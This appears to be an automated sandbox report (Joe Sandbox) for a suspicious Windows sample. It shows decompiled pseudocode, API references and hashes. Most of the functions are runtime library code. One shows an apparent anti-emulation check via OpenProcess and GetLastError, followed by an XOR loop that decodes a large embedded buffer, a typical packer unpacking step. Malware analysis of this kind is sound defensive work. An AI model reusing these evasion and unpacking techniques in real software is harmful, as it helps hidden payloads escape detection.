                      • Opcode Fuzzy Hash: c9523dda6824ec4036d905db8e5026e28b1662a4f388ada07bfa10bdfa5b0510
                      • Instruction Fuzzy Hash: 55F05B7231662167D23517AAAC8CD9BDA5DDF567A3B054021F905E1251CB308C025FE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093BF60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0093BF60() {
				struct HWND__* _t10;
				void* _t12;
				int _t15;

				_t15 = 0;
				_t10 = CreateWindowExW(0, 0x8002, 0, 0, 0, 0, 0, 0, 0, 0,  *0x958030, 0);
				if(_t10 == 0) {
					L8:
					return _t15;
				} else {
					_t12 = E0093C750(_t10);
					if(_t12 == 0) {
						L7:
						DestroyWindow(_t10);
						goto L8;
					} else {
						SetWindowLongW(_t10, 0, 0x31323334);
						while( *((intOrPtr*)(_t15 + _t12)) != 0x31323334) {
							_t15 = _t15 + 1;
							if(_t15 < 0x200) {
								continue;
							} else {
								DestroyWindow(_t10);
								return 0;
							}
							goto L9;
						}
						_t15 = _t15 + 4;
						goto L7;
					}
				}
				L9:
			}






                      0x0093bf67
                      0x0093bf7f
                      0x0093bf83
                      0x0093bfcc
                      0x0093bfd0
                      0x0093bf85
                      0x0093bf8c
                      0x0093bf90
                      0x0093bfc4
                      0x0093bfc5
                      0x00000000
                      0x0093bf92
                      0x0093bf99
                      0x0093bfa0
                      0x0093bfa9
                      0x0093bfb0
                      0x00000000
                      0x0093bfb2
                      0x0093bfb5
                      0x0093bfc0
                      0x0093bfc0
                      0x00000000
                      0x0093bfb0
                      0x0093bfc1
                      0x00000000
                      0x0093bfc1
                      0x0093bf90
                      0x00000000

                      APIs
                      • CreateWindowExW.USER32 ref: 0093BF79
                      • SetWindowLongW.USER32 ref: 0093BF99
                      • DestroyWindow.USER32(00000000,?,00000000), ref: 0093BFB5
                      • DestroyWindow.USER32(00000000,00000000,74656490,?,00000000), ref: 0093BFC5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$Destroy$CreateLong
                      • String ID: 4321
                      • API String ID: 4054532065-3297689448
                      • Opcode ID: 501c5ef72cdc9f28aeeefc847888f7c0ba00744af8b09e04fd834b467cfeaa1e
                      • Instruction ID: 104ddfbc842b4b4f08db8cb62b6dba84d87dba21ff4fcb06be4157ccd85ded0a
                      • Opcode Fuzzy Hash: 501c5ef72cdc9f28aeeefc847888f7c0ba00744af8b09e04fd834b467cfeaa1e
                      • Instruction Fuzzy Hash: AEF0807631963167D22137E9DC8CD97DA5CDF467B67055035F605E1251CB308C415FE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009313F5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44threadCOMMON
                      Download Yara Rule
                      C-Code - Quality: 68%
                      			E009313F5() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _t18;
				void* _t23;
				void* _t24;
				signed int _t25;
				long _t27;
				void* _t28;
				void* _t30;

				E0093132F(_t28);
				_t18 = 0x13;
				_v48 = 2;
				_v44 = 1;
				_v40 = 0x23;
				_v36 = 3;
				_v32 = 0xd;
				_v28 = _t18;
				_v24 = 0x14;
				_v20 = 0xa;
				_v16 = 0xb;
				_v12 = _t18;
				_v8 = 0xf;
				OpenProcess(0, 0, 0);
				if(GetLastError() == 0x57) {
					_t25 = 0;
					_t27 = 0;
					do {
						 *(_t27 + 0x944250) =  *(_t27 + 0x944250) ^  *(_t30 + _t25 * 4 - 0x2c);
						_t25 =  ==  ? 0 : _t25 + 1;
						_t27 = _t27 + 1;
						_t33 = _t27 - 0x13000;
					} while (_t27 < 0x13000);
					_t23 = E00931243(_t24, _t25, _t28, 0, _t33);
					_push(0);
					if(_t23 != 0) {
						L2:
						ExitProcess();
					}
					ExitThread();
				}
				_push(0);
				goto L2;
			}





















                      0x009313fc
                      0x00931403
                      0x00931406
                      0x00931410
                      0x00931417
                      0x0093141e
                      0x00931425
                      0x0093142c
                      0x0093142f
                      0x00931436
                      0x0093143d
                      0x00931444
                      0x00931447
                      0x0093144e
                      0x0093145d
                      0x00931466
                      0x00931468
                      0x0093146a
                      0x0093146e
                      0x0093147a
                      0x0093147d
                      0x0093147e
                      0x0093147e
                      0x00931486
                      0x0093148b
                      0x0093148e
                      0x00931460
                      0x00931460
                      0x00931460
                      0x00931490
                      0x00931490
                      0x0093145f
                      0x00000000

                      APIs
                        • Part of subcall function 0093132F: GetModuleFileNameW.KERNEL32(00000000,?,00000100), ref: 00931359
                        • Part of subcall function 0093132F: GetModuleFileNameW.KERNEL32(00000000,?,00000100), ref: 0093136C
                        • Part of subcall function 0093132F: GetLastError.KERNEL32 ref: 00931374
                        • Part of subcall function 0093132F: CharUpperBuffW.USER32(?,00000000), ref: 00931387
                        • Part of subcall function 0093132F: GetCurrentProcess.KERNEL32(00000000), ref: 009313AD
                        • Part of subcall function 0093132F: IsWow64Process.KERNEL32(00000000), ref: 009313B4
                        • Part of subcall function 0093132F: GetCurrentProcessId.KERNEL32 ref: 009313C7
                      • OpenProcess.KERNEL32(00000000,00000000,00000000), ref: 0093144E
                      • GetLastError.KERNEL32 ref: 00931454
                      • ExitProcess.KERNEL32(00000000), ref: 00931460
                      • ExitThread.KERNEL32 ref: 00931490
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CurrentErrorExitFileLastModuleName$BuffCharOpenThreadUpperWow64
                      • String ID: #
                      • API String ID: 3640460183-1885708031
                      • Opcode ID: c6ea82885ba5abf75d42bb62294400830deed16d71b6c5c775dfeb654af86cd7
                      • Instruction ID: 9d6dd05eb8b0ac12dc19085dc4d6a8faffdd4b470046f78cfa7f13a3dc7c5282
                      • Opcode Fuzzy Hash: c6ea82885ba5abf75d42bb62294400830deed16d71b6c5c775dfeb654af86cd7
                      • Instruction Fuzzy Hash: 53018470D152199BDB18AFB4C85C7DEBEF9EF09348F108018D015A62A1D7F80A459FF5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00931D3F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 16%
                      			E00931D3F(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}





                      0x00931d43
                      0x00931d4e
                      0x00931d56
                      0x00931d60
                      0x00931d68
                      0x00000000
                      0x00931d6d
                      0x00931d68
                      0x00931d72

                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00931D7E,00000000,?,00935078,000000FF,0000001E,00000000,00000000,00000000,?,009335E3), ref: 00931D4E
                      • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00931D60
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 1646373207-1276376045
                      • Opcode ID: 44ab9e2a770259f885d5d1ba07299ec75ae8dc166384c1e9d1f890085b828239
                      • Instruction ID: 20a8248edca4e7a123b2ade2d2f399b89cc0b1100c10952cd5fa5eec53e7149f
                      • Opcode Fuzzy Hash: 44ab9e2a770259f885d5d1ba07299ec75ae8dc166384c1e9d1f890085b828239
                      • Instruction Fuzzy Hash: 38D01230648208BBDB145BA1DC05F6A776DAB45741F040154B824D50E0DBA19A10AE64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009375CA Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009375CA(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E009339D6( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E0093750C( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E009342FC(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                      0x009375d2
                      0x009375d7
                      0x009375f1
                      0x00000000
                      0x009375f1
                      0x009375d9
                      0x009375de
                      0x00000000
                      0x00000000
                      0x009375e3
                      0x00937600
                      0x00937605
                      0x00937608
                      0x0093760f
                      0x0093762e
                      0x00937635
                      0x00937637
                      0x0093767b
                      0x0093768a
                      0x00937698
                      0x0093769a
                      0x009376aa
                      0x009376aa
                      0x009376ae
                      0x009376b0
                      0x009376b3
                      0x009376b3
                      0x009376b3
                      0x009376b3
                      0x00000000
                      0x009376b9
                      0x0093769c
                      0x0093769c
                      0x009376a1
                      0x009376a1
                      0x009376a4
                      0x00000000
                      0x009376a4
                      0x00937639
                      0x0093763c
                      0x00937640
                      0x00937669
                      0x00937669
                      0x0093766c
                      0x0093766c
                      0x00000000
                      0x00000000
                      0x0093766e
                      0x00937672
                      0x00000000
                      0x00000000
                      0x00937674
                      0x00937674
                      0x00000000
                      0x00937674
                      0x00937642
                      0x00937645
                      0x00000000
                      0x00000000
                      0x00937649
                      0x0093765c
                      0x00937662
                      0x00937665
                      0x00937667
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00937667
                      0x00937611
                      0x00937614
                      0x00937616
                      0x0093761b
                      0x0093761b
                      0x00937620
                      0x00000000
                      0x00937620
                      0x009375e5
                      0x009375ea
                      0x009375ee
                      0x009375ee
                      0x00000000

                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00937600
                      • __isleadbyte_l.LIBCMT ref: 0093762E
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 0093765C
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00937692
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      • Opcode ID: 245aa966855fd1f77c9d3ce5c533a57f92e62060ba6824a13a787ee26a24073e
                      • Instruction ID: 31df534d44fefe3d535cfbe4b84337c4610c9ad1b35dc4e5f85ff8a3ccbd42d0
                      • Opcode Fuzzy Hash: 245aa966855fd1f77c9d3ce5c533a57f92e62060ba6824a13a787ee26a24073e
                      • Instruction Fuzzy Hash: 6F31CFB0608646EFDB358EA9CC56BAABBA9FF41314F154929F814871A0E730D850DF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009350DD Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E009350DD(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x95729c, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x957fd0 - _t7;
								if(__eflags == 0) {
									_t9 = E009342FC(__eflags);
									 *_t9 = E0093430F(GetLastError());
									goto L17;
								} else {
									__eflags = E009345F0(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E009342FC(__eflags);
										 *_t12 = E0093430F(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E009345F0(_t6, _t31);
						 *((intOrPtr*)(E009342FC(__eflags))) = 0xc;
						goto L12;
					} else {
						E0093354D(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0093504B(__ebx, __edx, __edi, _a8);
				}
			}









                      0x009350e4
                      0x009350f2
                      0x009350f5
                      0x009350f7
                      0x00935106
                      0x00935139
                      0x00935139
                      0x0093513c
                      0x00000000
                      0x00000000
                      0x00935109
                      0x0093510b
                      0x0093510d
                      0x0093510d
                      0x0093510d
                      0x0093511a
                      0x00935120
                      0x00935122
                      0x00935124
                      0x00935184
                      0x00935184
                      0x00935126
                      0x00935126
                      0x0093512c
                      0x0093516e
                      0x00935182
                      0x00000000
                      0x0093512e
                      0x00935135
                      0x00935137
                      0x00935156
                      0x0093516a
                      0x00935150
                      0x00935150
                      0x00935150
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00935137
                      0x0093512c
                      0x00000000
                      0x00935152
                      0x0093513f
                      0x0093514a
                      0x00000000
                      0x009350f9
                      0x009350fc
                      0x00935102
                      0x00935102
                      0x00935153
                      0x00935155
                      0x009350e6
                      0x009350f0
                      0x009350f0

                      APIs
                      • _free.LIBCMT ref: 009350FC
                        • Part of subcall function 0093504B: __FF_MSGBANNER.LIBCMT ref: 00935062
                        • Part of subcall function 0093504B: __NMSG_WRITE.LIBCMT ref: 00935069
                        • Part of subcall function 0093504B: HeapAlloc.KERNEL32(00830000,00000000,00000001,00000000,00000000,00000000,?,009335E3,00000000,00000000,00000000,00000000,?,00933498,00000018,00941F40), ref: 0093508E
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocHeap_free
                      • String ID:
                      • API String ID: 1080816511-0
                      • Opcode ID: 4e5497515bac27710266de0d8def36d40164f46e9fdef71d6a7b4b78a454c233
                      • Instruction ID: 66ca754cbe2658e29ae2166be16f2f03a63d94938edd94198ad954fc84bbb040
                      • Opcode Fuzzy Hash: 4e5497515bac27710266de0d8def36d40164f46e9fdef71d6a7b4b78a454c233
                      • Instruction Fuzzy Hash: 0811C27280CA11ABCF342FF5AC0576A3B98AF48360F134925F8099B1A1DE74D9809E94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00938E3D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00938E3D(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0093938E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00938EC3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00939609(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00939548(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                      0x00938e40
                      0x00938e46
                      0x00938eb9
                      0x00000000
                      0x00938e4d
                      0x00938e4d
                      0x00938e50
                      0x00938e6b
                      0x00938e6e
                      0x00938e8e
                      0x00938ea0
                      0x00938e70
                      0x00938e70
                      0x00938e73
                      0x00000000
                      0x00938e75
                      0x00938e87
                      0x00938e87
                      0x00938e73
                      0x00938ebe
                      0x00938ec2
                      0x00938e52
                      0x00938e6a
                      0x00938e6a
                      0x00938e50

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                      • String ID:
                      • API String ID: 3016257755-0
                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction ID: e33522001c63742a456b874a3062a45355bf9244ec0b36b4835526fe078c14f9
                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction Fuzzy Hash: 09014B7240424EBBCF266E84DC41DEE3F66BB58354F588415FE1858131D736C9B1AF82
                      Uniqueness

                      Uniqueness Score: -1.00%